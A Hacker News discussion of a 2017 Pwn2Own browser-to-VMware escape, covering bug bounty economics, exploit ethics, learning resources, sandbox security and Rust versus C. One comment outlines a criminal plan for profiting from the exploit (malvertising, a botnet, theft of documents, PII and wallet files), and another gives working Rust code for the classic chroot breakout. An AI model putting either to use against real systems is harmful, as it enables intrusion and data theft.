Virtual machine escape fetches $100k at Pwn2Own hacking contest (arstechnica.com)
403 points by hcs on March 17, 2017 | 156 comments


So if you were using a use-once-and-destroy VM to do some Edge security testing, they could blow through everything and get you anyway. The fact that there are vulnerabilities in each of the three layers they needed to hit is unsurprising, but having one guy find all three is more incredible to me than Barcelona's recent comeback against PSG.


Yes, this has to be one of the most impressive - and scary - things I've read in a while. Fantastic work by the team, and thank goodness there are security competitions like these to serve as a rewarding outlet for their extreme talents.


That comment makes me wonder: would funding more of these with public money be worth it for the savings from avoided attacks?


I'd rather see this money used for increasing software security through all layers. [1][2]

See, all these vulnerabilities started as major or minor bugs, and those bugs originate from somewhere. While 100% bug-free software may be too hard to be worth the effort in most applications, there is a huge difference between the ideal state, where the first exploit hits you hard and after two or three more severe bugs in your software you are out of business, and what we actually have: you can "lose" huge amounts of data every few months and still stay in business. And no regulator, no expert in a lawsuit, actually nobody, wants to have a look at your source code anyway. Even if you don't hide it through SaaS or other means, almost nobody asks for the source. [3]

Instead, public money is used to declare "cyberwar" and to buy zero-days - which creates an incentive for people to keep their findings private instead of reporting them early on. And more importantly, these create an incentive to put in such bugs in the first place. [4]

[1] See also https://news.ycombinator.com/item?id=13772293

[2] audits, bug bounties (every bug, not just obviously-security-related bugs), better static analysis tooling and improving type systems and programming languages as a whole, donate to projects like OpenBSD and Mozilla / Rust, etc.

[3] ... unless it is about copyright. But I've never seen such a request in a software-security related incident.

[4] An attacker doesn't even need to establish a full-blown backdoor. They can just contribute some code with a missing or slightly-wrong check, and see how to exploit it later on, after enough time has passed.


We should also invest more in changing the assumption that "100% bug-free software may be too hard to be worth the effort in most applications". Ultimately, everything else is just a stopgap.


Good point!

My first reaction was: This is insane. Nobody is perfect. Let's try to reduce the bug rate to 1 bug / 100,000 LOC and we have achieved more than we can hope for.

However, thinking more about it, if you have a system with 1 million LOC and reduced your bug rate to 1 / 100,000 LOC, this means you need to fix 10 more bugs and you are 100% bug free. This doesn't sound infeasible at all. (Although it may be hard.)


Many companies have bug bounty programs where they will pay people who discover bugs.

I've read criticism of Pwn2Own arguing that some people will find an exploit and save it for the competition rather than disclosing it to the company right away. That delay gives others time to discover the same exploit and use it.


They are basically already funded by public money; the problem is just that the vulnerabilities found won't make it back to the vendors until they are burned.

- https://news.ycombinator.com/item?id=13810015


> thank goodness there's security competitions like these to work as a rewarding outlet for their extreme talents

$100k doesn't sound very rewarding.


In that case can I borrow $100k?


Y'know Y Combinator? That Startup Accelerator that runs this site?

They will just let you borrow $100k (well, $120k) if they like you and your idea. See http://www.ycombinator.com/ for more.

Snark aside, assuming the contestant took the whole year to work on the exploit, the chance of a $100k payout is small compared to the risk of not actually finding the exploit, combined with the fact that they could be making twice that working at a place like Facebook or Google.

Also, you'll note that the Ars article doesn't talk at all about the contestants whose hacks failed.


If you want to make the most money doing security research, your best bet is going to be finding people who will pay you to do security research. You get paid even if you don't find anything!

And $120k in exchange for equity is a sale not a loan or a gift.


Perhaps they came across the exploit under different circumstances? Perhaps they've exploited it themselves in the real world, but the lure of the $100k prize is worth giving-up-the-goods?


It's a fair point - bug bounties were controversial when companies started doing them, and even then, by reducing it to monetary terms, economics states they are only as effective as their payout.

For example, in the so-called "Cloudbleed" writeup, it was evident that Cloudflare was leaking authorization headers from Uber. If the security researcher who discovered it had far fewer morals, instead of reporting the issue to get it fixed, it's possible they had the power to change the bank account (or whatever) that each Uber driver gets paid into, to an account under the researcher's control.

For all their hard work and honesty, the security researcher (aside from the benefits of an awesome job at Google) won a grand prize of... a T-shirt from Cloudflare (hopefully it said "I broke the Internet and all I got was this T-shirt").

Maybe the pwn2own exploit did come from different circumstances. In that case, someone was able to reuse previous work and make an easy $100k. (If you're jealous of that, residuals in Hollywood are gonna make you move to LA.) Whatever portion of that $100k that came from VMWare, it's cheap for VMWare to know about this bug and to be able to close it, when their business model rests on their security claim that the guest cannot escape to the host.


>economics states they are only as effective as their payout.

It's a bit more complicated than that: to be effective, the bounty only has to be greater than the lowest value the bug has to any of the people who are aware of it. If even one of them could only get $20k for it elsewhere, a $25k bounty is enough to get the bug disclosed and burned for everyone.

That incentive, even though small, dramatically reduces the number of individuals who will know about the bug before it's disclosed. Since the set of people who are willing and able to exploit the bug for gain is small, keeping the number of people who know about an undisclosed bug small reduces the probability of an overlap.


This suggests that the number of vulnerabilities in each layer is large enough that a single team can discover several of them in a few months.


Or they're clever guys and gals who got a bit lucky? It's hard to say which is the case without a more comprehensive audit of the codebases in question.


As someone who uses Qubes OS, seeing cracks that allow a virtualised system to break out to the host is scary. After all, the entire security model of Qubes OS is based on the assumption that it's not possible to break out of the VMs.

I'm really glad these guys valued their reputation higher than the extra money they could have gotten from selling these exploits on the black market, but this makes me wonder how many such vulnerabilities are out there that haven't been published.


> seeing cracks that allow a virtualised system to break out to the host is scary

Hate to break this to you, but it's been shown time and time again that due to how caching and CPU pipelining works in modern processors, any "isolation" including full-on VM which is not "physical isolation" is leaky: https://pdfs.semanticscholar.org/e544/00824814fed2ef52bb8415... (overview of attacks)

Here is a particularly nice paper (proper methodology, well-explained intro, etc.) showing one example (a more or less regular cache timing attack, but with actual private info extraction from host, etc.): https://arxiv.org/abs/1702.08719 - these come up several times a year for various VMs, etc.


And even physical separation might not be enough due to EM radiation and power usage.


Those problems can and have been resolved with appropriate power filters and shielding.


It is many orders of magnitude harder to get data out of a physically separate computer in the vicinity than to get it from one VM on a machine to the host or to another VM on that same machine.


I agree, but VM security and exploits also get orders of magnitude more attention. Besides, physical separation does not just apply to the data-center. Consider EM radiation from phones and laptops.


Indeed, all commonly-used hypervisors have had host escape vulnerabilities reported over the years, including Xen as used in Qubes - see e.g. http://blog.quarkslab.com/xen-exploitation-part-3-xsa-182-qu...

Of relevance to Edge exploitation, Microsoft are currently working on a Qubes-like sandboxing model for Edge, based on Hyper-V (though it looks like it'll be aimed towards enterprise customers rather than consumers): https://blogs.windows.com/msedgedev/2016/09/27/application-g.... Will be interesting to see if that's part of the challenge in Pwn2Own 2018. Somewhat surprisingly, Hyper-V wasn't successfully exploited at this year's contest.


Why are you surprised Hyper-V hasn't been exploited? Did it happen in the past?

And this is VMware Workstation, not ESXi, which many people in this thread seem to be confusing.


This is the first time Hyper-V has been offered as a target in Pwn2Own, but it's had its share of host escape bugs over the years. The latest one was patched in this month's updates, just before the contest.


Actually, the bug was in the VMware Tools, which may be installed on your VMs handled by ESXi.


That's not how it works I'm afraid.

Otherwise if I installed those VMware tools on my physical computer and exploited them... to where do I escape? Alternate reality?

:-)


The flaw is to think that security can ever be 100% tight.

Not even physical security is organized like that.

At best you can design for a certain level of determination of the attacker, and that's it. Any attacker that is more determined will eventually get past.

The question is what you are protecting against.

Your garden variety identity scammer?

NSA?

Sometimes it feels like _sec has developed NSA myopia.


How does someone learn this skill? I get that it obviously takes a ton of work, but how do you even prepare/study for whatever that work actually is in the first place? The intuition required seems so different from anything my intuition about computer systems would even allow me to imagine.


> How does someone learn this skill?

Broadly, the basis for this is an understanding of how computers actually work. If you learned about it in school, the class would have started with Von Neumann vs. Harvard architecture, graduated to building a CPU from scratch (well, from logic gates anyway, possibly in Verilog), and been followed by another class about writing an operating system: kernel, drivers, then a (rudimentary) userland - a basic implementation of syscalls, a glibc-type library to make those syscalls, a basic shell on top of that. Add to that knowledge a perseverant attitude (getting exploits to work can involve trying to debug code with zero feedback).

As far as this hack goes, broken down into three separate pieces, the exploits should be understandable as being sandbox escapes, but for three different sandboxes (Browser, OS, VM). Sandboxes are implemented in code, the code is going to have bugs, and exploits are "merely" a case of figuring out how to use the bugs to your advantage. No one's made a totally hack-proof sandbox. Not Apple (this year's contest featured a touchbar takeover), not Google (Chrome's fallen in years past), apparently not Microsoft or VMware (nor Linux/Canonical/Ubuntu, either).

If you're interested in learning about this stuff, microcorruption is an online security CTF "game" that starts off fairly easily. https://microcorruption.com/login

The contest part of SANS' holiday hack challenge is over, but the game itself is still up. https://holidayhackchallenge.com/2016/

Rootme is another one. https://www.root-me.org/

(I'm sure there are many more out there, those are just the 3 that came to mind.)


Can you show me where the touchbar takeover is? That seems really interesting, especially if they took over the watchOS chip in the touchbar.


A good security class will give you the principles. Look at CS 161 at Berkeley:

http://www-inst.cs.berkeley.edu/~cs161/sp16/

Any bug is a potential exploit. That exploit may not get you very far but it can be chained with another which will get you further.

The principles are almost elegant. The details are mind numbing. Luckily, common exploits get collected into metasploit:

https://www.metasploit.com/

Script kiddies (Annoyingly Persistent Teenagers to quote Nick Weaver) generally use toolkits like metasploit.


I recently watched and enjoyed this:

https://www.youtube.com/watch?v=xkdPjbaLngE

where he describes the hack of the Nintendo Switch, because they shipped an old version of Webkit. It's pretty impressive to see how "just" Javascript can jump from browser to native.


Really excellent video.

The material is good, but the guy also shows an amazing teaching technique.

I wish commercial tutorial producers would put such care into their courses.


Thank you. I enjoyed it too.


I have two recommendations that anyone with a CS degree or equivalent knowledge should be able to jump into with 0 other training, and come out with a solid understanding of how to find vulnerabilities and exploit them.

* Hacking: The Art Of Exploitation

This is an excellent book. It's lab-oriented, so you will be getting hands-on experience with reverse engineering and exploiting software.

And: http://opensecuritytraining.info/

They have a graph of classes somewhere, and you can see "Oh I want to get to advanced exploitation, what should I take?" and you just follow along. Start with intro to x86, intermediary x86, then move on to the software vulnerability classes, life of a binary, etc.

Really, with these skills alone you can self-teach the rest of the way. There's a book called The Art Of Kernel Exploitation, if I'm remembering right, that would take you into a more advanced but more niche area, and it's really up to you where to go after you get the basics (just like with programming).


I too would like to know. One recommendation I saw in regards to learning to hack stuff like the Nintendo Switch is, first learn to write a kernel, and also learn about compilers. Also, personally I've been considering working through Bunnie Huang's "Hacking the Xbox".


> Also, personally I've been considering working through Bunnie Huang's "Hacking the Xbox".

Do so. It was the first Bunnie book I purchased, and now I'm a lifelong fan owning all of his work.

If you haven't read his most recent book, "The Hardware Hacker", it's a must read.


Just finished reading "Hacking the Xbox," per your suggestion - agree that it's quite good at explaining the process. The actual presentation does a good job of condensing what I imagine was an arduous adventure. Thanks for the recommendation.


So glad you enjoyed it!


Look at all the historical claims and the techniques involved. It takes a lot of tenacity and trying things that shouldn't work but on extremely rare occasions somehow do.

A lot of them publish source code that demonstrates how the exploit worked, plus when paired with an open-source project that has a vulnerability you can see how that matches up to the target.

There's a large toolbox of techniques to learn, but in this fashion they're surprisingly well documented. Using these techniques you can find other exploits if you're creative.


Hacking, 2nd Edition is a great introduction.

https://www.nostarch.com/hacking2.htm


An experienced programmer can simply read through the code and see edge cases that might be exploitable. Often they work from decompiled/disassembled code and use debuggers.


You don't learn it so much as gain experience over decades.


A set of exploits like the 3 described could be worth quite a bit on the open market. I'm surprised how low the bounty was for a full vmware escape starting from a browser. Surely there are other exploits like this out in the wild under government lock and key.


Do you really believe that this team has the skills and knowledge to find these bugs and construct working exploits for them, but then don't understand the exploit market? Or, that they act against their own best economic interests?


> but then don't understand the exploit market? Or, that they act against their own best economic interests?

Maybe they're just ethical by nature. If I could make lots of money by breaking the law or doing something un-ethical I (and in fact the vast majority of people) still wouldn't do it. Money isn't the only motivating factor.

So it is quite possible these exploits would have been worth more on the open market, and still the team decided to work on this in a white-hat setting because they are simply good people.


They could sell it to the US Government.


That would not be ethical either.


Given the current administration and political climate, giving it to the government would be even more unethical. Especially because criminals don't have the funds the NSA does, and the NSA is 100% guaranteed to get away with any wrongdoing.


I think any kind of releasing or hoarding of exploits without doing what's possible to get the holes closed is unethical, no matter who the recipient is; there are not many shades of gray there.


Yes but it would be legal.


> that they act against their own best economic interests?

If you consider just your own "best economic interest", a lot of "jobs" like drug dealing, prostitution, fraud etc. are good choices. Morals, not wanting to go to jail, and a concern for your own physical security are non-economic factors that make these bad choices in most people's view. Blackhat hacking falls pretty much in the same category; selling exploits may perhaps be technically legal, but I wouldn't bet my paycheck that you couldn't be put behind bars for aiding and abetting in a criminal offense or similar.


Best short term economic interests, maybe.

But building a reputation as brilliant whitehat surely confers significant economic benefits as well.


It can be in your long run interest not to sell attacks on companies on the open market. That is shady stuff and not worth it for many people.


These guys are definitely acting against their own best economic interest. Good for them.


That's what I was thinking. $100k for this sounds low.


Say you have such an exploit. How do you propose making money from it? Exactly what steps would you take?


Find the sketchiest ad networks (http://krebsonsecurity.com/ has lots of reading and links). You'll need to front some cash to buy bitcoin to buy time on those ad networks. Put your "ad" consisting of this exploit on the network, which then manages to root both the machine visiting the web page, and the VMWare host machine. Use this to build a botnet.

Given how juicy the VMWare escape is, I'd also just start dumping ~/Documents/ on any machine that you escape out from the guest OS on. Who knows what they'll have?

It's mostly going to be boring, so you'll want to automate this, but infect enough machines and you'll hit easy scammer pay dirt- PII on millions of people, despite regulations that prohibit doing this. Credit cards, social security numbers, phone numbers, addresses. From there, it's just a felony or two away from either stealing people's identities yourself, or selling the list in a scam forum (for way more than $100k). There are all sorts of juicy data that you might find; VMWare isn't something that most people run, and maybe there are other monetizable bits of data.

Assuming you don't find the scammers' wet dream in stolen data though, you're reduced to trying to monetize in other ways: desktop popups, DDoS for hire, cryptolocker-style data-ransom, using the machine as a host for sending spam.

It's 2017 and it really sucks that spam is still such a huge problem (Gmail's spam filter is only so effective because Google's team works hard, and is good at their job, not because the problem has gone away). As a spammer though, this means it's still lucrative enough that there's some non-zero amount of money to be made. Due to the VMWare escape involved, you'll have fewer problems with machines in your botnet going offline (how often do you reimage a VMWare host compared to the guests on it?) and can charge more money to use it too.

There are established scammer networks that can already monetize a botnet and selling your botnet and its capabilities to them might be easier than monetizing yourself, but at some level in order to make money you start getting some serious exposure that will land you in prison for years if you get caught, plus you'll eventually start working with scary people that will kill you if it suits them.


I think you're vastly overestimating the number of VMware backed browsers as well as the money to be made in a botnet. As well as the effort in actually setting all this up and maintaining opsec.

I'm also not convinced a VMware escape is something people get killed over. The leaked "Hacking Team" data shows exploits aren't worth that much more on the market (iOS being a big exception).


You forgot to automatically copy any wallet files you find.


There are various security broker companies that governments work with. An unscrupulous pentester could find one, email them, and ask them if they're interested.

The trouble would be how to prove the exploit works without also revealing how it's done. The best bet would be to demo one or two out of the three exploits required to work, then talk business in exchange for the third.


Business transactions between parties that don't trust each other are a solved problem: escrow.


Does escrow really work with secrets like this? The buyer receives the exploit and claims it doesn’t work. The seller claims it does. The money is still in escrow. How do you proceed? The escrow agent is getting a commission, they should not have access to the full secret. It’s really hard to find an escrow agent who has the skills to assess an exploit and whom both the buyer and the seller would trust not to leak it or use it for their own benefit.


You could have the inspection done by an independent third party.

Anyway, it's been done before by guess-who:

https://www.mitnicksecurity.com/shopping/absolute-zero-day-e...


Does escrow really work with shady black hat deals like these?


Depends on who the buyer is and yes, it does work, there are even specialized marketplaces. You'd still be dealing with the devil but you very likely will get paid.


Perhaps they think the exposure they'll get from this is worth it.


While crafting the exploit may seem like the hard part I can imagine trying to market it and get paid can be very difficult too.


For me $100k sounds almost like a joke... especially when it puts billion-dollar companies to shame.


It's not high because it is VMware Workstation, not ESXi.


Impressive.

Is there consensus on security bad/best practices when it comes to VMs and containers? I mean, if even established VMs/hypervisors can't save you, what prospect is there that containers will actually contain anything?

Maybe POSIX chroot jails aren't that bad after all? Because, like, they're the simplest thing that can possibly work, and don't come with the complexity of VMs and Linux containers/namespaces; and if they turn out to be vulnerable you'd be able to switch to another kernel (BSDs)?


You have bugs in every (mainstream) kernel. With them, you can elevate your privileges to kernel level, and once you've done that it's game over.

There is no reason to believe an additional layer (a VM) will always protect you (at least given how they are also written in unsafe languages for now). However, there is no reason to believe it will on average make things worse, and every reason to believe it will on average increase your security.


Please read this article[1] about how exactly chroot jails function as a security measure.

If you have a process that's already not running as root, all a chroot jail does is decrease the attack surface a bit by giving that process a more limited view of the filesystem. As soon as you run something as root, or give that chroot process access to a vulnerable setuid-root binary, it can escape. An exploit anywhere in the kernel (not just in the implementation of chroot) could lead to the system being taken over.

Chroot jails are easy to reason about, but they don't really help you if you're, say, studying malware.

[1]: https://access.redhat.com/blogs/766093/posts/1975883
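
To make the "as soon as you run something as root" caveat concrete, here is a minimal sketch of the classic chroot breakout, written in Rust and assuming the `libc` crate; the directory name is illustrative, and the whole thing only works because the jailed process already has root / CAP_SYS_CHROOT, which is exactly the precondition described above:

    use std::ffi::CString;

    fn main() {
        let subdir = CString::new("breakout").unwrap(); // illustrative name
        let dotdot = CString::new("..").unwrap();
        let dot = CString::new(".").unwrap();

        unsafe {
            // chroot() into a subdirectory of the jail. Crucially, chroot() does not
            // change the current working directory, which now sits *outside* the new root.
            libc::mkdir(subdir.as_ptr(), 0o755);
            libc::chroot(subdir.as_ptr());

            // Because the CWD is outside the root, ".." traversal is never clamped,
            // so we can walk all the way up to the host's real "/" ...
            for _ in 0..64 {
                libc::chdir(dotdot.as_ptr());
            }

            // ... and re-root there. The jail is gone.
            libc::chroot(dot.as_ptr());
        }
    }

Without root (or a vulnerable setuid binary to obtain it), the chroot() calls above simply fail with EPERM - which is the parent's point.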


"Is there consensus on security bad/best practices when it comes to VMs and containers?"

Yes - it's called simplicity. Fewest moving parts possible. Limit attack surface to the smallest amount possible.

You can pursue this at every layer of the stack and at every layer of abstraction - it should be a primary design philosophy that informs every system you build.


Basically the VM layer is sandwiched between the guest and the host OS. With a full VM you have a separate kernel. With containers, like Docker, you share a kernel.

The VM is then considered more secure because it adds that extra layer between them... but is it? It's just more code - more code, more problems.

The more effective solution is to simply harden the kernel of the host system, and then use a lighter solution like docker. Grsecurity + Docker seems like a solid fit to me, and you can mash another layer like Apparmor on top. It is very rare that I see a kernel vulnerability that would not be entirely mitigated by Grsecurity, or otherwise made far more costly.

The point is to stop adding layers on top and instead to focus on securing that lower, trusted base.


The title is misleading: it was a virtual machine escape starting from a web browser, all the way down to the host machine.


As someone said in a comment: "Breaking out of the Alcatraz, and then breaking into Fort Knox right afterwards!"


Dunno, seems pretty good. I'm much more impressed by escaping the virtual machine than a microsoft browser.


Makes for a better movie title. I mean who'd pay to see Escape from Microsoft Edge?


Misleading in a way that makes it seem less impressive than it actually was.


Really, they escaped from two virtual machines, the JavaScript VM and the VMWare VM. Maybe give them half a VM-point for breaking the confines of the Windows process (if you take your OS textbook seriously, a process is an abstraction of a computer, so sort of a VM).


Ideally that process is a jail. If Edge is anything like Chrome, it has dropped privileges for that process and that process is just a renderer.

https://seclab.stanford.edu/websec/chromium/chromium-securit...

Read this as I'm very impressed by the exploit.


One of those "VMs" gets escaped from all the time. The other is made by VMware.


One of them has plenty of help from the hardware and has a pretty limited feature set.


> You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes.

~Theo de Raadt

http://marc.info/?l=openbsd-misc&m=119318909016582


This is why we need Rust. Had Windows, Edge, and VMware used Rust, these bugs wouldn't have happened. Rust is a game changer with its borrow checker.


I love Rust too, but while it likely would have prevented these three bugs, there are many other classes of bugs caused by poorly designed interfaces/abstractions/protocols, misunderstandings, "valid but wrong" logic mistakes, unanticipated interactions, etc.

Let's not make magic bullet statements about technology. It's a good way to scare people away...


It likely would prevent the vast majority of bugs that are actively exploited in security breaches.

Sure, bad logic bugs happen of course, but more often than not they result in bugs relating only to their own area and are often somewhat limited in scope. They're also usually a fairly significant mistake that's oftentimes easier to see - not necessarily all the time, but I'm probably more likely to catch a logic bug in a code review than I am a memory issue beyond a missing free.

Memory bugs however are much nastier - even a minor mistake can result in a complete takeover of the system as manipulation of the instruction pointer basically means game over and there are many ways to get that with only a little memory manipulation - blow out the stack until you overwrite the return address, overwrite vtables on the heap, overwrite function pointers, etc. Even a minor off-by-one can result in total exploitation in some scenarios.


> while it likely would have prevented these three bugs

Isn't that the point of the parent's comment?


I think the point is that Rust fanboys will repeat the same thing for years ("all security bugs would have been avoided if Rust had been used"), and when the first security issue is found in Servo or another Rust component (maybe the kernel some Rust devs are working on), Rust's reputation will suffer. I see tons of articles and blog posts, most of them written to slap the annoying fanboys who repeat the same thing. By the way, if they had used C# then those 3 bugs would not have happened either; the thing is that for some use cases you have to do unsafe stuff, and C#, like Rust, has a way to run unsafe code, so the bug could still have happened, especially in low-level code like a JIT.


> I think the point is that Rust fanboy will repeat same thing for years "all security bugs would have been avoided if Rust was used"

Complete hyperbole. All anyone says is that Rust prevents a class of security issues related to memory access.


OP is correct in saying Rust would have prevented these specific bugs, so I don't understand why you're trying to dismiss them as a "fanboy".


I am 99% sure that OP did not check the code and make sure that Rust could have been used there without unsafe, so at most you could say "maybe Rust or any other memory-safe language would have avoided this issue". But since this is code related to VMs and JITs, you may have to use the unsafe parts of those languages, so maybe it was not avoidable.


If the type of bug is a use-after-free, double free, data race or uninitialized memory - Rust would have dealt with it.
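
A minimal illustration of what "dealt with it" means for the use-after-free case - this toy program is rejected at compile time instead of compiling into a latent memory bug:

    fn main() {
        let data = vec![1, 2, 3];
        let first = &data[0];   // shared borrow into `data`
        drop(data);             // error[E0505]: cannot move out of `data` because it is borrowed
        println!("{}", first);  // the dangling read the borrow checker refuses to allow
    }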


And only if the code was not part of an unsafe section of Rust code. I have nothing against advocating for your favorite software, but if you do it wrong by "omitting" things, it will backfire. As a Linux user I've seen this happen: some fanboy convinces people to use Linux (usually Arch, because that distro attracts fanboys), then the new user finds the ugly parts that were not advertised and runs away screaming.


This is specious reasoning. You have to go out of your way to write unsafe broken code. The default in Rust is for memory safety. Yes, someone could theoretically be using an unsafe block and raw pointers to manipulate a memory buffer. But they probably aren't, because that's generally pretty stupid unless you're implementing a higher-level wrapper around the buffer, which very few people do because there's generally already a wrapper that does what you want (often provided by the stdlib). And even if you are, the unsafe code is contained in a very small area which makes it much easier to review for safety.


I was talking about low-level code like in this case, where you interact with the kernel. For calling kernel/OS functions you will have to pass pointers and buffers around, and I am not sure you can wrap the kernel functions without making things slower by adding indirection.


For any call that takes a raw pointer and a length, you can create a trivial wrapper that takes a &[u8] or &mut [u8] instead in order to make it safe. And you probably should do that, because you don't want to be sprinkling `unsafe` throughout your entire codebase. If you're really worried about indirection, you can also mark these inline, but they're small enough that the compiler would probably inline them anyway.
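
A sketch of that pattern; `device_write` is a made-up stand-in for whatever pointer-and-length call is actually being wrapped:

    extern "C" {
        // Hypothetical foreign function taking a raw pointer and a length.
        fn device_write(buf: *const u8, len: usize) -> i32;
    }

    /// Safe wrapper: callers hand over a slice, so the pointer and the length can never disagree.
    #[inline]
    pub fn write_device(buf: &[u8]) -> i32 {
        // The single unsafe line in the module; everything reaching it is compiler-checked.
        unsafe { device_write(buf.as_ptr(), buf.len()) }
    }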


So, instead of making every thread about every security issue ever a lament for how much better the world would have been if everything was written in Rust: where is the Rust-based OS that is in wide deployment because of its superior performance and bug-free nature? It should be a walk in the park to power your way to world dominance with such a huge difference from the established order.

Having the world re-written in rust is roughly the same as having linux on the desktop everywhere. It so far hasn't happened and what the world will look like once it does is anybody's guess, some classes of bugs will disappear, quite possibly. Other classes of bugs may then become more dominant. If rust automatically meant 'bug free software' that would be one thing but there are many classes of bugs and quite a few of those classes will lead to security issues.


>...same as having linux on the desktop everywhere. It so far hasn't happened and...

It kind of has, though Linux contributed the kernel, not the UI. And the "desktop" is the mobile phone. It's not what everyone had in mind when we talked about Linux on the desktop though.

But to answer your point about Rust, the reason there is no such OS is that security in itself is not a prevailing factor when people choose OS. Which doesn't make gp's argument false, it just shows why his wishes about Rust in critical software will probably never be granted.


The linux on the desktop statements were aimed at displacing windows on the desktop in its traditional role in businesses and homes, something that hasn't really happened.

What has happened is that a new class of devices was created that uses linux at the core, but that's not the desktop. (Happy 'linux on the desktop' user here since a very long time, roughly since it supported 'X' and my trusty SGI Indy got too slow to stay with the times).

Anybody that wants Rust to replace C (or any other language) would be better off coding than complaining.


I agree, I only wanted to point out the irony of "linux on desktop". It actually happened* (MS failed big time), but not the way it was meant.

You had your own SGI Indy? I only had temporary access to one, but loved it at the time...

EDIT: it happened at home (mobile), not so much in business.


> You had your own SGI Indy?

A whole bunch of them in fact. The only thing surviving from those days are the keyboards. Indestructible.


Windows might have been the OS with the overall top market share at one point (depending on precisely what you include in your measure); however, measuring only "traditional" desktop/WS and server makes no sense anymore, and even Android alone has now nearly caught it: http://gs.statcounter.com/os-market-share

If you consider all the consumer electronics with a GUI that run under Linux, it is probably even "worse" (well, worse for Windows...)

You could argue that all of that does not make a unified platform, but neither does all the Windows (although the fragmentation might be somewhat less important there)

Believing that a system/techno can take over the world in a year can be stupid. Believing that market dominance can't change in a decade or 2 (even if that's driven by usage changes), equally so.

(I was kind of surprised when MS started to completely switch their strategy and be furiously OS agnostic in tons of area. When you look at the figures, they actually did not have the choice if they want to survive the next several decades, and they probably would not have done that if they had...)


While Rust can reduce the chance of these kinds of bugs, it cannot completely prevent them.

For instance, the browser Javascript VM will most likely use some form of JIT, which works by generating machine code at runtime, and then executing the generated code. Nothing in the Rust language can prevent a bug in the generated code from being exploitable.

And even within pure Rust code, developers can and will do unsafe tricks to get the last few percent points of speed (for instance, storing flags in the least significant bit of pointers). While Rust requires these parts to be marked with "unsafe" (which allows reviewers to focus on them), it cannot prevent bugs caused by these pieces of code.
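
For the curious, a toy version of the "flag in the least significant bit of a pointer" trick mentioned above (plain std Rust, nothing else assumed) - note that the tagging itself is just integer arithmetic the type system cannot check, and the dereference has to live in an unsafe block:

    fn main() {
        // u64 allocations are at least 8-byte aligned, so the low bits of the address are free.
        let raw = Box::into_raw(Box::new(42u64)) as usize;
        debug_assert_eq!(raw & 1, 0);

        let tagged = raw | 1;                 // stash a boolean flag in bit 0

        let flag = (tagged & 1) == 1;
        let ptr = (tagged & !1) as *mut u64;  // forget to mask the tag off and you dereference garbage
        unsafe {
            println!("flag = {}, value = {}", flag, *ptr);
            drop(Box::from_raw(ptr));         // hand the allocation back to Box so it gets freed
        }
    }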


This seems like a strawman. "Rust prevents these bugs", "Oh, but Rust doesn't prevent all bugs!".


Buffer overflows and uninitialized memory are not only possible in Rust (excuse me, "unsafe Rust", as if that were a different thing), if Rust gains any genuine traction and widespread use it is very likely they'll exist "in the wild" and as exploits waiting to be discovered.

Rust isn't a panacea or cure-all, and its fans are doing more harm than good (for Rust) by their zealotry on this matter, in my view.

And just to make it very clear: I do like Rust. It has some great features that I can envision having an excellent (and superior to C or C++) case for using in certain kinds of systems and application programming. But I'm not convinced these features are as much of a safeguard as some apparently are.
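
The first point is easy to demonstrate - a sketch of the same out-of-bounds write in safe vs. unsafe Rust (the unsafe line is undefined behaviour, shown only to illustrate the claim):

    fn main() {
        let mut buf = vec![0u8; 4];

        // Safe indexing is bounds-checked: this line would panic, not corrupt memory.
        // buf[4] = 1;

        // The unsafe escape hatch skips the check entirely: a classic heap overflow.
        unsafe {
            *buf.get_unchecked_mut(4) = 1;
        }
    }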


> (excuse me, "unsafe Rust", as if that were a different thing)

They are - there is a world of difference between the two. From a security perspective the ability to audit unsafety explicitly is massive. Right now we rely on intuition and fuzzing at large scale to try to cover massive parts of a codebase. With explicit unsafety you can limit your checks to a subset of modules, rather than the entire program. Massive, massive difference that cannot be overstated.

> if Rust gains any genuine traction and widespread use it is very likely they'll exist "in the wild" and as exploits waiting to be discovered.

Naturally. But this certainly isn't worse than where we are now - where languages make 0 effort to be safe, or have far too much historic baggage to do it meaningfully.

Beyond that, rust's attitude towards security is pretty positive. Rust has been quick to adopt LLVM sanitizer support, fuzzer support for AFL and cargo-fuzz, and new mitigation techniques such as safestack. With rust's updates coming out quickly you get access to these in a matter of weeks/ months as opposed to years.

Rust isn't a cure-all, no one should be calling it one. But your response is overly pessimistic.


I mostly agree, but I think pessimism and skepticism are very much warranted in the area of security especially. Perhaps doubly so with new languages, and even more with new languages that purport to be safe(r).


Being critical and pursuing the issue is one thing. You can find lots of work on formally verifying Rust code as well as its type safety online.


That is definitely why we need to stop using C. It's beyond ridiculous.


Not as ridiculous as the costs of rewriting monstrous codebases that thousands of people worked on over many years. Let's not lose our sense of scale.

Businesses love money more than they love C, if rewriting made economic sense, it wouldn't need to be lobbied.


It doesn't make economic sense because VMWare and Microsoft don't have to pay out of pocket if a box in a datacenter is compromised and data is leaked because of bugs in their VMs and kernels that are only possible because of C.

This is like hiring somebody to build a bridge, having it fall due to incompetence and kill hundreds of people, and then having nobody suffer any consequences. "Eh, bridges fall, what can you do."

Make people pay for buffer overflows and C is gone tomorrow.


> This is like hiring somebody to build a bridge, it falling due to incompetence killing hundreds of people and then having nobody suffer any consequences. "Eh, bridges fall, what can you do."

You can't really use these analogies in a security context, because real world engineers aren't liable if their designs fail due to sabotage, overloading or other unexpected conditions outside the standards they designed to.

Software is different to real world 'analog' engineering in that a single very small mistake can bring down the whole thing. Most civil engineering designs would be riddled with small mistakes like that, but the overall system has (multiple layers of) factors of safety built in and the ability of other parts to compensate. You can see how concrete buildings in war zones (even places with shoddy engineering standards to begin with) can take large fractions of their structure being shot away before failing. A software vulnerability though is like finding just one perfect place where a single bullet could bring the whole thing down.


Good point - some rights can't be signed away by contracts and license agreements, no matter what those say. For example automobile manufacturers can't hand you a sales agreement that exempts them from (a whole list of) responsibilities, because governments recognize a public interest and pass laws insisting on safety standards, availability of parts for 20 years, etc, etc. Govts should now catch up with the modern world and recognize the public interest in computer infrastructure safety; by ensuring that IT can't license away its responsibility to take all reasonable measures to reduce risk (thus opening up liability as well.) At some point, using Rust - in many cases - even if it's more expensive, will be such a reasonable safety measure enforced by tort law or statute. Not quite yet, perhaps, because the language is young. But soon.

The EU is now taking Google and other corporations to task for their user agreements (licenses), to try to get them into compliance with consumer law there. It's a start, I suppose. https://www.theregister.co.uk/2017/03/17/europe_facebook_goo...


Make people liable for software bugs and IT will be gone tomorrow.


There will always be software bugs. What I'm trying to say is that people should be made liable for avoidable bugs due to incompetence or ill-placed personal preferences ("Real programmers write in C!11").

There are times when C is unavoidable, unfortunately, but when somebody chooses a technology regardless of better, safer alternatives, "just because", they should be made liable, absolutely.

